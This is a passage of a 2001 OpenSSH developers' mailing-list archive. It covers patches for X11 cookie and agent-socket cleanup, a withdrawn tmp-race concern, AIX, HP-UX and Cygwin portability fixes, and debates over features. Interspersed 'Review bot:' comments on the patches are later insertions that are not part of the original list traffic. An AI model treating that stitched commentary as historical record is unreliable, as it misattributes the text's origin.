> @@ -2566,11 +2573,9 @@ > snprintf(channel_forwarded_auth_socket_name, MAX_SOCKET_NAME, "%s/agent.%d", > channel_forwarded_auth_socket_dir, (int) getpid()); > > - if (atexit(cleanup_socket) < 0) { > - int saved = errno; > - cleanup_socket(); > - packet_disconnect("socket: %.100s", strerror(saved)); > - } > + /* delete agent socket on fatal() */ > + fatal_add_cleanup(auth_sock_cleanup_proc, pw); > + > /* Create the socket. */ > sock = socket(AF_UNIX, SOCK_STREAM, 0); > if (sock < 0) > Index: channels.h > =================================================================== > RCS file: /home/markus/cvs/ssh/channels.h,v > retrieving revision 1.31 > diff -u -r1.31 channels.h > --- channels.h 2001/04/13 22:46:53 1.31 > +++ channels.h 2001/06/05 14:37:23 > @@ -293,6 +293,8 @@ > */ > char *auth_get_socket_name(void); > > +void auth_sock_cleanup_proc(void *_pw); > + > /* > * This is called to process SSH_CMSG_AGENT_REQUEST_FORWARDING on the server. > * This starts forwarding authentication requests. > Index: session.c > =================================================================== > RCS file: /home/markus/cvs/ssh/session.c,v > retrieving revision 1.74 > diff -u -r1.74 session.c > --- session.c 2001/04/17 19:34:25 1.74 > +++ session.c 2001/06/05 14:39:54 > @@ -89,12 +89,15 @@ > void session_set_fds(Session *s, int fdin, int fdout, int fderr); > void session_pty_cleanup(Session *s); > void session_proctitle(Session *s); > +int session_setup_x11fwd(Session *s); > +void session_close(Session *s); > void do_exec_pty(Session *s, const char *command); > void do_exec_no_pty(Session *s, const char *command); > void do_login(Session *s, const char *command); > void do_child(Session *s, const char *command); > void do_motd(void); > int check_quietlogin(Session *s, const char *command); > +void xauthfile_cleanup_proc(void *pw); > > void do_authenticated1(Authctxt *authctxt); > void do_authenticated2(Authctxt *authctxt); 
> @@ -154,18 +157,26 @@ > do_authenticated2(authctxt); > else > do_authenticated1(authctxt); > + > + /* remote user's local Xauthority file and agent socket */ > + if (xauthfile) > + xauthfile_cleanup_proc(authctxt->pw); > + if (auth_get_socket_name()) > + auth_sock_cleanup_proc(authctxt->pw); > } > > /* > * Remove local Xauthority file. > */ > void > -xauthfile_cleanup_proc(void *ignore) > +xauthfile_cleanup_proc(void *_pw) > { > - debug("xauthfile_cleanup_proc called"); > + struct passwd *pw = _pw; > + char *p; > > + debug("xauthfile_cleanup_proc called"); > if (xauthfile != NULL) { > - char *p; > + temporarily_use_uid(pw); > unlink(xauthfile); > p = strrchr(xauthfile, '/'); > if (p != NULL) { > @@ -174,6 +185,7 @@ > } > xfree(xauthfile); > xauthfile = NULL; > + restore_uid(); > } > } > > @@ -209,7 +221,7 @@ > { > Session *s; > char *command; > - int success, type, fd, n_bytes, plen, screen_flag, have_pty = 0; > + int success, type, n_bytes, plen, screen_flag, have_pty = 0; > int compression_level = 0, enable_compression_after_reply = 0; > u_int proto_len, data_len, dlen; > > @@ -290,22 +302,6 @@ > break; > > case SSH_CMSG_X11_REQUEST_FORWARDING: > - if (!options.x11_forwarding) { > - packet_send_debug("X11 forwarding disabled in server configuration file."); > - break; > - } > - if (!options.xauth_location) { > - packet_send_debug("No xauth program; cannot forward with spoofing."); > - break; > - } > - if (no_x11_forwarding_flag) { > - packet_send_debug("X11 forwarding not permitted for this authentication."); > - break; > - } > - debug("Received request for X11 forwarding with auth spoofing."); > - if (s->display != NULL) > - packet_disconnect("Protocol error: X11 display already set."); > - > s->auth_proto = packet_get_string(&proto_len); > s->auth_data = packet_get_string(&data_len); 
> > @@ -325,31 +321,11 @@ > 4 + proto_len + 4 + data_len, type); > s->screen = 0; > } > - s->display = x11_create_display_inet(s->screen, options.x11_display_offset); > - > - if (s->display == NULL) > - break; > - > - /* Setup to always have a local .Xauthority. */ > - xauthfile = xmalloc(MAXPATHLEN); > - strlcpy(xauthfile, "/tmp/ssh-XXXXXXXX", MAXPATHLEN); > - temporarily_use_uid(s->pw); > - if (mkdtemp(xauthfile) == NULL) { > - restore_uid(); > - error("private X11 dir: mkdtemp %s failed: %s", > - xauthfile, strerror(errno)); > - xfree(xauthfile); > - xauthfile = NULL; > - /* XXXX remove listening channels */ > - break; > + success = session_setup_x11fwd(s); > + if (!success) { > + xfree(s->auth_proto); > + xfree(s->auth_data); > } > - strlcat(xauthfile, "/cookies", MAXPATHLEN); > - fd = open(xauthfile, O_RDWR|O_CREAT|O_EXCL, 0600); > - if (fd >= 0) > - close(fd); > - restore_uid(); > - fatal_add_cleanup(xauthfile_cleanup_proc, NULL); > - success = 1; > break; > > case SSH_CMSG_AGENT_REQUEST_FORWARDING: > @@ -402,9 +378,7 @@ > > if (command != NULL) > xfree(command); > - /* Cleanup user's local Xauthority file. */ > - if (xauthfile) > - xauthfile_cleanup_proc(NULL); > + session_close(s); > return; > > default: > @@ -1372,23 +1346,7 @@ > int > session_x11_req(Session *s) > { > - int fd; > - if (no_x11_forwarding_flag) { > - debug("X11 forwarding disabled in user configuration file."); > - return 0; > - } > - if (!options.x11_forwarding) { > - debug("X11 forwarding disabled in server configuration file."); > - return 0; > - } > - if (xauthfile != NULL) { > - debug("X11 fwd already started."); > - return 0; > - } > - > - debug("Received request for X11 forwarding with auth spoofing."); > - if (s->display != NULL) > - packet_disconnect("Protocol error: X11 display already set."); > + int success; > > s->single_connection = packet_get_char(); > s->auth_proto = packet_get_string(NULL); 
> @@ -1396,33 +1354,12 @@ > s->screen = packet_get_int(); > packet_done(); > > - s->display = x11_create_display_inet(s->screen, options.x11_display_offset); > - if (s->display == NULL) { > + success = session_setup_x11fwd(s); > + if (!success) { > xfree(s->auth_proto); > xfree(s->auth_data); > - return 0; > } > - xauthfile = xmalloc(MAXPATHLEN); > - strlcpy(xauthfile, "/tmp/ssh-XXXXXXXX", MAXPATHLEN); > - temporarily_use_uid(s->pw); > - if (mkdtemp(xauthfile) == NULL) { > - restore_uid(); > - error("private X11 dir: mkdtemp %s failed: %s", > - xauthfile, strerror(errno)); > - xfree(xauthfile); > - xauthfile = NULL; > - xfree(s->auth_proto); > - xfree(s->auth_data); > - /* XXXX remove listening channels */ > - return 0; > - } > - strlcat(xauthfile, "/cookies", MAXPATHLEN); > - fd = open(xauthfile, O_RDWR|O_CREAT|O_EXCL, 0600); > - if (fd >= 0) > - close(fd); > - restore_uid(); > - fatal_add_cleanup(xauthfile_cleanup_proc, s); > - return 1; > + return success; > } > > int > @@ -1636,6 +1573,10 @@ > void > session_close(Session *s) > { > + if (s->display) { > + xauthfile_cleanup_proc(s->pw); > + fatal_remove_cleanup(xauthfile_cleanup_proc, s->pw); > + } > session_pty_cleanup(s); > session_free(s); > session_proctitle(s); 
> @@ -1710,11 +1651,57 @@ > setproctitle("%s@%s", s->pw->pw_name, session_tty_list()); > } > > +int > +session_setup_x11fwd(Session *s) > +{ > + int fd; > + struct stat st; > + > + if (no_x11_forwarding_flag) { > + packet_send_debug("X11 forwarding disabled in user configuration file."); > + return 0; > + } > + if (!options.x11_forwarding) { > + debug("X11 forwarding disabled in server configuration file."); > + return 0; > + } > + if (!options.xauth_location || > + (stat(options.xauth_location, &st) == -1)) { > + packet_send_debug("No xauth program; cannot forward with spoofing."); > + return 0; > + } > + if (s->display != NULL) { > + debug("X11 display already set."); > + return 0; > + } > + xauthfile = xmalloc(MAXPATHLEN); > + strlcpy(xauthfile, "/tmp/ssh-XXXXXXXX", MAXPATHLEN); > + temporarily_use_uid(s->pw); > + if (mkdtemp(xauthfile) == NULL) { > + restore_uid(); > + error("private X11 dir: mkdtemp %s failed: %s", > + xauthfile, strerror(errno)); > + xfree(xauthfile); > + xauthfile = NULL; > + return 0; > + } > + strlcat(xauthfile, "/cookies", MAXPATHLEN); > + fd = open(xauthfile, O_RDWR|O_CREAT|O_EXCL, 0600); > + if (fd >= 0) > + close(fd); > + restore_uid(); > + s->display = x11_create_display_inet(s->screen, options.x11_display_offset); > + if (s->display == NULL) { > + xauthfile_cleanup_proc(s->pw); > + return 0; > + } > + fatal_add_cleanup(xauthfile_cleanup_proc, s->pw); > + return 1; > +} > + > void > do_authenticated2(Authctxt *authctxt) > { > > server_loop2(); > - if (xauthfile) > - xauthfile_cleanup_proc(NULL); > } From genco at olympos.gen.tr Fri Jun 8 08:10:42 2001 
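Review bot: in the channels.c hunk, auth_sock_cleanup_proc() nulls channel_forwarded_auth_socket_name after the unlink, which is what makes it safe to run both from do_authenticated() and again from the fatal() cleanup list, but channel_forwarded_auth_socket_dir keeps pointing at the removed directory. Clear it in the same block, and consider a fatal_remove_cleanup(auth_sock_cleanup_proc, authctxt->pw) in do_authenticated() next to the direct call, mirroring what session_close() does for the xauthfile, so no cleanup stays registered with a pw pointer after the session is gone.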
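Review bot: in the session.c SSH_CMSG_X11_REQUEST_FORWARDING hunk (and the same shape in session_x11_req()), a failed session_setup_x11fwd() frees s->auth_proto and s->auth_data but leaves both pointers set, so any later code that tests s->auth_proto to decide whether xauth data exists would read freed memory. Set both to NULL right after the xfree() calls in the failure path.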
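Review bot: session_setup_x11fwd() replaces the old packet_disconnect("Protocol error: X11 display already set.") with debug() and return 0, so a second X11 request on one session is now refused instead of terminating the connection; that is a deliberate protocol-behaviour change and belongs in the commit message. The four refusal paths also mix packet_send_debug() (visible to the client) with debug() (server log only): "X11 forwarding disabled in server configuration file" was sent to the client in the SSH1 path before and is log-only now, so choose per condition on purpose. Creating the cookie directory before x11_create_display_inet() and undoing it with xauthfile_cleanup_proc(s->pw) when the display cannot be created does close the old "XXXX remove listening channels" gap.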
From: genco at olympos.gen.tr (Genco Yilmaz)
Date: Fri, 8 Jun 2001 01:10:42 +0300 (EEST)
Subject: WARNING: putuserattr SEC_COMMIT failed: A file or directory
Message-ID:

hi,
I am taking an error like this while logging into an AIX 4.3.3 on ssh 2.4.0

WARNING: putuserattr SEC_COMMIT failed: A file or directory in the path
name does not exist.

is there anyone knowing why this happens or do you know anybody who can
tell me why it happens ?

thanks in advance .

From carson at taltos.org Fri Jun 8 08:16:38 2001
From: carson at taltos.org (Carson Gaspar)
Date: Thu, 07 Jun 2001 15:16:38 -0700
Subject: HPUX: ssh hangs after shell exit
In-Reply-To: <3B1F89D3.6598D9@mail.microcenter.com>
Message-ID: <4084520090.991926998@[192.168.1.103]>

While discussing this with an HP employee many moons ago, I was told that:

- If SA_RESTART is in effect, HP-UX will re-start the select system call
  (this is perfectly fine POSIX compliant behaviour)

HOWEVER

- if select is restarted, it resets the timeout start time

This is _evil_. If you get signals more frequently than once per timeout
period, select will _never_ timeout. There is some HP-UX specific workaround
involving extensions to the siginfo structure, if I recall correctly, but I
don't know the specifics.

--
Carson

From nalin at redhat.com Fri Jun 8 10:07:32 2001
From: nalin at redhat.com (Nalin Dahyabhai)
Date: Thu, 7 Jun 2001 20:07:32 -0400
Subject: OpenSSH tmp cleanup
In-Reply-To: <20010607225233.A21260@folly>; from markus.friedl@informatik.uni-erlangen.de on Thu, Jun 07, 2001 at 10:52:33PM +0200
References: <20010605092146.A39858@messi.uku.fi> <20010605165404.A13522@faui02.informatik.uni-erlangen.de> <20010607225233.A21260@folly>
Message-ID: <20010607200732.M864@redhat.com>

On Thu, Jun 07, 2001 at 10:52:33PM +0200, Markus Friedl wrote:
> did someone check this?

The patch appears to prevent the deletion of wrong files, but it still
looks to me that if a local user can hit the window between the
mkdtemp() and open() calls, he can cause the cookie file to be created
in any directory the superuser can write to.

Would it be safer to create the directory with superuser privileges, and
then change the ownership of the directory to the user's UID after the
cookie file was created? The sticky bit set on /tmp would keep a user
from being able to play tricks with symlinks....

The post on BugTraq which I saw mentioned that sshd didn't clear its
supplemental groups list at startup time. Something like this before the
first fork() should fix that:

    if (setgroups(0, NULL) < 0)
        if (debug_flag)
            error("setgroups() failed: %.200s", strerror(errno));
        else
            fatal("setgroups() failed: %.200s", strerror(errno));

Cheers,
Nalin

From tim at multitalents.net Fri Jun 8 14:57:18 2001
From: tim at multitalents.net (Tim Rice)
Date: Thu, 7 Jun 2001 21:57:18 -0700 (PDT)
Subject: Unreviewed 2.9p1 patches?
In-Reply-To: <20010607061453.J14017@postal.il.thewrittenword.com>
Message-ID:

On Thu, 7 Jun 2001 openssh-unix-dev at thewrittenword.com wrote:

> Anyone get a chance to review the patches we submitted?
> http://marc.theaimsgroup.com/?l=openssh-unix-dev&m=99041860215437&w=2

Not yet. There are a bunch of build related patches that I have on my
personal TODO list to look at.

>
>

--
Tim Rice Multitalents (707) 887-1469
tim at multitalents.net

From Jarno.Huuskonen at uku.fi Fri Jun 8 15:13:25 2001
From: Jarno.Huuskonen at uku.fi (Jarno Huuskonen)
Date: Fri, 8 Jun 2001 08:13:25 +0300
Subject: OpenSSH tmp cleanup
In-Reply-To: <20010607225233.A21260@folly>; from markus.friedl@informatik.uni-erlangen.de on Thu, Jun 07, 2001 at 10:52:33PM +0200
References: <20010605092146.A39858@messi.uku.fi> <20010605165404.A13522@faui02.informatik.uni-erlangen.de> <20010607225233.A21260@folly>
Message-ID: <20010608081325.A226588@messi.uku.fi>

On Thu, Jun 07, Markus Friedl wrote:
> did someone check this?
>
> -m

[patch snapped]

The patch did apply to openssh-2.9p1, and it compiles but unfortunately
I haven't had the time to test it yet.

Thanks,
-Jarno
--
Jarno Huuskonen - System Administrator | Jarno.Huuskonen at uku.fi

From Markus.Friedl at informatik.uni-erlangen.de Fri Jun 8 18:40:28 2001
From: Markus.Friedl at informatik.uni-erlangen.de (Markus Friedl)
Date: Fri, 8 Jun 2001 10:40:28 +0200
Subject: OpenSSH tmp cleanup
In-Reply-To: <20010607200732.M864@redhat.com>; from nalin@redhat.com on Thu, Jun 07, 2001 at 08:07:32PM -0400
References: <20010605092146.A39858@messi.uku.fi> <20010605165404.A13522@faui02.informatik.uni-erlangen.de> <20010607225233.A21260@folly> <20010607200732.M864@redhat.com>
Message-ID: <20010608104028.C21817@faui02.informatik.uni-erlangen.de>

On Thu, Jun 07, 2001 at 08:07:32PM -0400, Nalin Dahyabhai wrote:
> On Thu, Jun 07, 2001 at 10:52:33PM +0200, Markus Friedl wrote:
> > did someone check this?
>
> The patch appears to prevent the deletion of wrong files, but it still
> looks to me that if a local user can hit the window between the
> mkdtemp() and open() calls, he can cause the cookie file to be created
> in any directory the superuser can write to.

how can he do this?

we switch to the uid of the user before mkdtemp() and back after
the call to open().

From Jarno.Huuskonen at uku.fi Fri Jun 8 19:54:28 2001
From: Jarno.Huuskonen at uku.fi (Jarno Huuskonen)
Date: Fri, 8 Jun 2001 12:54:28 +0300
Subject: WARNING: putuserattr SEC_COMMIT failed: A file or directory
In-Reply-To: ; from genco@olympos.gen.tr on Fri, Jun 08, 2001 at 01:10:42AM +0300
References:
Message-ID: <20010608125428.A92916@messi.uku.fi>

On Fri, Jun 08, Genco Yilmaz wrote:
> hi,
> I am taking an error like this while logging into an AIX 4.3.3 on ssh 2.4.0
>
> WARNING: putuserattr SEC_COMMIT failed: A file or directory in the path
> name does not exist.
>
> is there anyone knowing why this happens or do you know anybody who can
> tell me why it happens ?

What exactly are you trying to do ? connect to AIX server (running the
commercial ssh 2.4.0) ? How is this related to OpenSSH ? Are you using
openssh client and the server error happens only when connecting with
openssh-client ?

-Jarno
--
Jarno Huuskonen - System Administrator | Jarno.Huuskonen at uku.fi

From wooledg at eeg.ccf.org Fri Jun 8 22:22:25 2001
From: wooledg at eeg.ccf.org (Greg Wooledge)
Date: Fri, 8 Jun 2001 08:22:25 -0400
Subject: Defect: OpenSSH hangs on logout
In-Reply-To: ; from stevesk@pobox.com on Thu, Jun 07, 2001 at 11:42:27AM -0700
References: <20010607092831.D24958@eeg.ccf.org>
Message-ID: <20010608082225.F24958@eeg.ccf.org>

On Thu, Jun 07, 2001 at 11:42:27AM -0700, Kevin Steves wrote:

> stevesk 1611 1609 9 11:33:29 ? 0:00
> root 1609 912 0 11:33:28 ? 0:00 sshd: stevesk at 1
>
> the server was blocked in select() when the SIGCHLD was received, and it
> was restarted, where it is blocked waiting for input. if you enter one
> character it will return and process the sigchld handler flag.

Ah! Yes, I've seen that one too -- but I didn't consider it a serious
bug because all I have to do is press Enter to get my prompt back.

Unfortunately, I don't know of any way to reproduce that one consistently.
(And naturally, when I want to test it, I can't make it show up....)

From edgy at us.ibm.com Fri Jun 8 23:15:07 2001
From: edgy at us.ibm.com (Edward Geraghty)
Date: Fri, 8 Jun 2001 09:15:07 -0400
Subject: WARNING: putuserattr SEC_COMMIT failed: A file or directory
Message-ID:

Hello,

I'm going on memory here. I remember seeing this problem when your
/etc/security/lastlog file is corrupted. As a test, backup and truncate
your lastlog file. Commands similar to:

cp /etc/security/lastlog /etc/security/lastlog.saveme
cp /dev/null /etc/security/lastlog

If this works.. I have no idea what process corrupts the lastlog file..

Good Luck,
EdGy

Jarno Huuskonen @mindrot.org on 06/08/2001 05:54:28
Sent by: owner-openssh-unix-dev at mindrot.org
To: openssh-unix-dev at mindrot.org
cc:
Subject: Re: WARNING: putuserattr SEC_COMMIT failed: A file or directory

On Fri, Jun 08, Genco Yilmaz wrote:
> hi,
> I am taking an error like this while logging into an AIX 4.3.3 on ssh 2.4.0
>
> WARNING: putuserattr SEC_COMMIT failed: A file or directory in the path
> name does not exist.
>
> is there anyone knowing why this happens or do you know anybody who can
> tell me why it happens ?

What exactly are you trying to do ? connect to AIX server (running the
commercial ssh 2.4.0) ? How is this related to OpenSSH ? Are you using
openssh client and the server error happens only when connecting with
openssh-client ?

-Jarno
--
Jarno Huuskonen - System Administrator | Jarno.Huuskonen at uku.fi

From abush at microcenter.com Fri Jun 8 23:20:49 2001
From: abush at microcenter.com (Aaron Bush)
Date: Fri, 08 Jun 2001 09:20:49 -0400
Subject: Defect: OpenSSH hangs on logout
References: <20010607092831.D24958@eeg.ccf.org> <20010608082225.F24958@eeg.ccf.org>
Message-ID: <3B20D131.5C6BFDA@mail.microcenter.com>

Greg Wooledge wrote:
>
> On Thu, Jun 07, 2001 at 11:42:27AM -0700, Kevin Steves wrote:
>
> > stevesk 1611 1609 9 11:33:29 ? 0:00
> > root 1609 912 0 11:33:28 ? 0:00 sshd: stevesk at 1
> >
> > the server was blocked in select() when the SIGCHLD was received, and it
> > was restarted, where it is blocked waiting for input. if you enter one
> > character it will return and process the sigchld handler flag.
>
> Ah! Yes, I've seen that one too -- but I didn't consider it a serious
> bug because all I have to do is press Enter to get my prompt back.
>
> Unfortunately, I don't know of any way to reproduce that one consistently.
> (And naturally, when I want to test it, I can't make it show up....)

The real danger that i have come across is when doing a scp a defunct
process will show up after the copy is complete. Basically you end up with
a scp that never returns which is very bad.

-ab

From dwd at bell-labs.com Sat Jun 9 01:29:29 2001
From: dwd at bell-labs.com (Dave Dykstra)
Date: Fri, 8 Jun 2001 10:29:29 -0500
Subject: Patch to enable multiple possible sources of entropy
In-Reply-To: <20010607125014.A15157@lucent.com>; from dwd@bell-labs.com on Thu, Jun 07, 2001 at 12:50:14PM -0500
References: <20010607125014.A15157@lucent.com>
Message-ID: <20010608102929.A4439@lucent.com>

On Thu, Jun 07, 2001 at 12:50:14PM -0500, Dave Dykstra wrote:
> I have a need to have the same OpenSSH binaries run on multiple machines
> which are administered by different people. That means on Solaris, for
> example, there will be some with /dev/random, some on which I can run prngd
> because they'll be installing my binaries as root, and some which will have
> neither because they will be only installed as non-root. Below is a patch
> to enable choosing all 3 possible sources at compile time, with the
> available source selected at run time. If no configure parameters are
> given, it will still determine the entropy source at compile time and only
> the code for the one type, exactly as it does today. The patch adds a
> configure option called --with-builtin-entropy.
>
> I have tested this in all possible combinations of entropy sources, and on
> 6 different flavors of Unix (linux, solaris, sunos4, hpux, irix, and
> unixware1).

Argh, there's one minor modification needed for unixware1 (my test there
hadn't been complete enough): unix-domain sockets on unixware1 are
implemented as named pipes that have to be mode 000, so the call to
access(PRNGD_SOCKET, R_OK) doesn't work. Change that R_OK to F_OK; that
works on all platforms.

- Dave Dykstra

From vinschen at redhat.com Sat Jun 9 01:31:49 2001
From: vinschen at redhat.com (Corinna Vinschen) Date: Fri, 8 Jun 2001 17:31:49 +0200 Subject: [PATCH]: Add check_ntsec to ownership/mode tests In-Reply-To: <20010604122554.M595@cygbert.vinschen.de>; from vinschen@redhat.com on Mon, Jun 04, 2001 at 12:25:54PM +0200 References: <20010604122554.M595@cygbert.vinschen.de> Message-ID: <20010608173149.F18483@cygbert.vinschen.de> On Mon, Jun 04, 2001 at 12:25:54PM +0200, Corinna Vinschen wrote: > Hi, > > I have added calls to `check_ntsec()' to the code which checks > for the ownership and modes of identity files and directories. > As you might know, check_ntsec() tests if owner/modes are > supported by the OS (9x/ME=no, NT/W2K=yes), the filesystem > (FAT/FAT32=no, NTFS=yes) and the current Cygwin settings > (ntea/ntsec). My patch wasn't relative to the latest sources. Sorry 'bout that. The below patch now should apply cleanly to the current version in CVS. Corinna Index: auth-rhosts.c =================================================================== RCS file: /cvs/openssh_cvs/auth-rhosts.c,v retrieving revision 1.17 diff -u -p -r1.17 auth-rhosts.c --- auth-rhosts.c 2001/04/12 23:34:35 1.17 +++ auth-rhosts.c 2001/06/08 15:28:28 @@ -228,6 +228,9 @@ auth_rhosts2(struct passwd *pw, const ch pw->pw_name, pw->pw_dir); return 0; } +#ifdef HAVE_CYGWIN + if (check_ntsec(pw->pw_dir)) +#endif if (options.strict_modes && ((st.st_uid != 0 && st.st_uid != pw->pw_uid) || (st.st_mode & 022) != 0)) { Index: auth-rsa.c =================================================================== RCS file: /cvs/openssh_cvs/auth-rsa.c,v retrieving revision 1.32 diff -u -p -r1.32 auth-rsa.c --- auth-rsa.c 2001/06/05 20:25:05 1.32 +++ auth-rsa.c 2001/06/08 15:28:28 
@@ -158,6 +158,9 @@ auth_rsa(struct passwd *pw, BIGNUM *clie xfree(file); return 0; } +#ifdef HAVE_CYGWIN + if (check_ntsec(file)) +#endif if (options.strict_modes && secure_filename(f, file, pw->pw_uid, line, sizeof(line)) != 0) { xfree(file); Index: auth2.c =================================================================== RCS file: /cvs/openssh_cvs/auth2.c,v retrieving revision 1.61 diff -u -p -r1.61 auth2.c --- auth2.c 2001/06/05 20:25:06 1.61 +++ auth2.c 2001/06/08 15:28:28 @@ -698,6 +698,9 @@ user_key_allowed(struct passwd *pw, Key xfree(file); return 0; } +#ifdef HAVE_CYGWIN + if (check_ntsec(file)) +#endif if (options.strict_modes && secure_filename(f, file, pw->pw_uid, line, sizeof(line)) != 0) { xfree(file); -- Corinna Vinschen Cygwin Developer Red Hat, Inc. mailto:vinschen at redhat.com From nalin at redhat.com Sat Jun 9 02:36:31 2001 
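Review bot: in the auth-rhosts.c hunk the inserted `#ifdef HAVE_CYGWIN` / `if (check_ntsec(pw->pw_dir))` / `#endif` makes the following `if (options.strict_modes && ...) { ... }` its unbraced body, and nothing in the indentation shows that nesting; anyone who later inserts a statement between the two lines changes the logic without noticing. Folding the test into the condition is more robust: `if (options.strict_modes && check_ntsec(pw->pw_dir) && ((st.st_uid != 0 && ...` with a `#define check_ntsec(p) 1` fallback in the portability header for non-Cygwin builds, which also removes the #ifdef from the function body.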
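Review bot: in the auth-rsa.c and auth2.c hunks, when check_ntsec(file) returns 0 the whole secure_filename() check is skipped with no trace in the log, so an administrator who set StrictModes on a FAT volume or with ntsec off has no way to see that the ownership and mode checks are not being enforced for that key file. Add a debug() (or verbose()) in that branch naming the file, and use the same brace-free prefix cautiously: the `if (check_ntsec(file))` line owns the entire `if (options.strict_modes && secure_filename(...) != 0) { ... }` block that follows it, which the indentation does not show.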
From: nalin at redhat.com (Nalin Dahyabhai)
Date: Fri, 8 Jun 2001 12:36:31 -0400
Subject: OpenSSH tmp cleanup
In-Reply-To: <20010608104028.C21817@faui02.informatik.uni-erlangen.de>; from Markus.Friedl@informatik.uni-erlangen.de on Fri, Jun 08, 2001 at 10:40:28AM +0200
References: <20010605092146.A39858@messi.uku.fi> <20010605165404.A13522@faui02.informatik.uni-erlangen.de> <20010607225233.A21260@folly> <20010607200732.M864@redhat.com> <20010608104028.C21817@faui02.informatik.uni-erlangen.de>
Message-ID: <20010608123631.P864@redhat.com>

On Fri, Jun 08, 2001 at 10:40:28AM +0200, Markus Friedl wrote:
> On Thu, Jun 07, 2001 at 08:07:32PM -0400, Nalin Dahyabhai wrote:
> > On Thu, Jun 07, 2001 at 10:52:33PM +0200, Markus Friedl wrote:
> > > did someone check this?
> >
> > The patch appears to prevent the deletion of wrong files, but it still
> > looks to me that if a local user can hit the window between the
> > mkdtemp() and open() calls, he can cause the cookie file to be created
> > in any directory the superuser can write to.
>
> how can he do this?
>
> we switch to the uid of the user before mkdtemp() and back after
> the call to open().

My mistake. I didn't read that part of the patch closely enough, and got
confused by the call to restore_uid() in cases where mkdtemp() fails.
Never mind. Sorry for the confusion.

Nalin

From dwd at bell-labs.com Sat Jun 9 03:29:30 2001
From: dwd at bell-labs.com (Dave Dykstra) Date: Fri, 8 Jun 2001 12:29:30 -0500 Subject: configure --with-catman is supposed to be --with-mantype Message-ID: <20010608122930.A8082@lucent.com> There's a typo in configure.in that's specifying --with-catman as an option but the help message says --with-mantype. Here's a patch. - Dave Dykstra *** configure.in.old Fri Jun 8 13:23:13 2001 --- configure.in Fri Jun 8 13:17:47 2001 *************** *** 1422,1428 **** AC_SUBST(INSTALL_SSH_PRNG_CMDS) ! AC_ARG_WITH(catman, [ --with-mantype=man|cat|doc Set man page type], [ case "$withval" in --- 1422,1428 ---- AC_SUBST(INSTALL_SSH_PRNG_CMDS) ! AC_ARG_WITH(mantype, [ --with-mantype=man|cat|doc Set man page type], [ case "$withval" in From sunil at redback.com Sat Jun 9 04:19:13 2001 From: sunil at redback.com (Sunil K. Vallamkonda) Date: Fri, 8 Jun 2001 11:19:13 -0700 (PDT) Subject: how to specify cipher for ssh client ? Message-ID: Hello, I have: SSH-1.5-OpenSSH_2.3.1p1 I find that this client displays error when I specify (from command line), '-c' [cipher] for SSH1. {for SSH2 looks okay}. Thus, if I specify: ./ssh -v -l user -c des -1 host or ./ssh -v -l user -c 3des -1 host I get error: bad cipher des [des] or error: bad cipher 3des [3des] respectively.... and client immediately exits ! But, this is okay: ./ssh -v -l user -c 3des-cbc -2 host looks fine. Any suggestions ? Thank you, Sunil. From qralston+ml.openssh-unix-dev at andrew.cmu.edu Sat Jun 9 06:20:09 2001 
From: qralston+ml.openssh-unix-dev at andrew.cmu.edu (James Ralston)
Date: Fri, 8 Jun 2001 16:20:09 -0400 (EDT)
Subject: SSH / X11 auth: needless complexity -> security problems?
In-Reply-To: <20010606101118.B18811@faui02.informatik.uni-erlangen.de>
Message-ID:

On Wed, 6 Jun 2001, Markus Friedl posted the following to Bugtraq:

> this feature [placing the X11 cookie file in /tmp] was inherited
> from ossh and the reason was:
> 1) if $HOME is on NFS, then the cookie travels unencrypted
> over the network, this defeats the purpose of X11-fwding
> 2) $HOME/.Xauthority gets polluted with temporary cookies.
> however, i'm not sure whether the benefit justifies the complexity,
> so this feature could be removed from future OpenSSH versions.

Please do not remove this feature.

On many of the systems I have to access, I am in that exact same
situation--my home directory is on NFS, and I most emphatically DO NOT
want my X11 cookies stored there. Not only does doing so cause my cookies
to cross the wire unencrypted, but if I then su, I can't access the
cookies without special pains (because the NFS servers in question all
map the client's root to anonymous).

In fact, one of the (many) reasons I'm motivated to replace the rest of
our ssh.com servers with openssh servers is *because* I'll get rid of
ssh.com's "I'll just munge the .Xauthority file in your home directory,
mwa ha ha!" behavior. Openssh's behavior is conceptually cleaner, even if
the price that is paid for it is careful attention to the
creation/deletion of the cookie file (and its containing directory).

(There's also no real way I can implement the placement myself. My shell
rc file automatically exports a TMPDIR value that it creates on the fly
using "mktemp -d", but openssh has to place the cookies file before the
shell is invoked...)
--
James Ralston, Information Technology
Software Engineering Institute
Carnegie Mellon University, Pittsburgh, PA, USA

From qralston+ml.openssh-unix-dev at andrew.cmu.edu Sat Jun 9 07:36:12 2001
From: qralston+ml.openssh-unix-dev at andrew.cmu.edu (James Ralston)
Date: Fri, 8 Jun 2001 17:36:12 -0400 (EDT)
Subject: authorized_keys2 directory idea
In-Reply-To:
Message-ID:

My $0.02: I'd like to see this feature.

I'm not really concerned with the authorized_keys{,2} entries. Where I
think the feature would be a win is with known_hosts{,2}. My known_hosts
file currently has 50+ entries, and it's a royal PITA to maintain them.

The easiest way I've found to reliably keep files in sync across
different machines is rsync-over-ssh. That works great if the granularity
of change you're dealing with is a file, because rsync is flexible enough
to express conditions like:

1. Only add files that do not exist on the target.
2. Don't overwrite newer files on the target.
3. Delete files that exist on the target but not on the source.

But when the granularity of change is the *content* of an individual
file, this won't work. All I can tell using rsync is that the files
differ. To tell what those differences are, I have to scp the remote file
to the local system, diff it, figure out how to reconcile the
differences, modify the local version of the remote file, and then scp it
back to the remote system.

Now repeat this about a dozen times or so. It's a big waste of time, and
it's not fun.

And yes, this task would be simpler if I could always push my changes out
immediately after I make them. But that's not always possible (due to
firewalls and depending on whether I'm at work, home, or on the road).
And it's not always desirable either: my known_hosts files are not
strictly identical across all of the machines I access. (I could,
however, express "push-only-if-older-version-exists-on-target" using
rsync.)

On Sun, 3 Jun 2001, Markus Friedl wrote:

> i don't understand why editing a file is hard. i think keeping a
> file in sync is simpler than syncing directories, especially
> deleting files.

It might be simpler for you, but that doesn't mean it's simpler for
everyone.
On Sun, 3 Jun 2001, Theo de Raadt wrote:
> OpenSSH is security software. A lot of you keep asking for more and
> more features, and the code keeps growing and growing and growing.
> Assuming that the number of lines per bug is a constant, how long
> before one of these features which no one uses becomes a hole?

You have a good point: it would be unwise to carelessly add additional features to OpenSSH.

However, good software grows or dies, and OpenSSH is no exception. Carelessly *refusing* to add additional features to OpenSSH will damage the project every bit as much as (if not more than) carelessly adding additional features, because the former will antagonize more people (including supporters and contributors, both current and potential) than the latter.

